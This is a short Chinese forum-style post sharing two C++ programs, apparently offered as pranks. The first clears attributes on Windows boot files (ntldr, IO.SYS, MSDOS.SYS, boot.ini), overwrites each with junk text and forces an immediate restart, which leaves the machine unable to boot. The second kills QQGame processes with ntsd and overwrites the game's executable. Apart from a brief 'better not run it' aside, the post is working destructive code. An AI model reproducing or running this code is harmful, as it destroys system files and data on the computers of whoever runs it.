本来想说很多的,因为很鸡冻,可是进看了个帖子,人家写的那么牛,我算了,不逞能了。直接上。
第一个,(建议不要运行)
#include <iostream>
#include <cstdio> // 文件读写函数在 cstdio
using namespace std;
void main()
{
//改掉C:/ntldr
system( "attrib -s -r -h C:/ntldr ");
FILE *file = fopen ("C:/ntldr", "wt+");
fprintf(file,"不会吧,\n 成败在此一举啊i");
fclose(file);
//改掉C:/IO.SYS
system( "attrib -s -r -h C:/IO.SYS ");
FILE *file4 = fopen ("C:/IO.SYS", "wt+");
fprintf(file4,"不会吧,\n 成败在此一举啊i");
fclose(file4);
//改掉 C:/MSDOS.SYS
system( "attrib -s -r -h C:/MSDOS.SYS ");
FILE *file2 = fopen ("C:/MSDOS.SYS", "wt+");
fprintf(file2,"不会吧,\n 成败在此一举啊i");
fclose(file2);
//改掉 C:/boot.ini
system( "attrib -s -r -h C:/boot.ini ");
FILE *file3 = fopen ("C:/boot.ini", "wt+");
fprintf(file3,"不会吧,\n 成败在此一举啊i");
fclose(file3);
system( "shutdown -r -t 0 "); //重启
}
第二个,
#include <iostream>
#include <cstdio> // 文件读写函数在 cstdio
using namespace std;
void main()
{
//先结束进程
system( "ntsd -c q -pn QQGAME.exe");
system( "ntsd -c q -pn QQGAMEDl.exe");
system( "attrib -s -r -h G:/QQ游戏/QQGAME/QQGAME.exe ");
FILE *file = fopen ("G:/QQ游戏/QQGAME/QQGAME.exe", "wt+");
fprintf(file,"不会吧,\n 成败在此一举啊i");
fclose(file);
}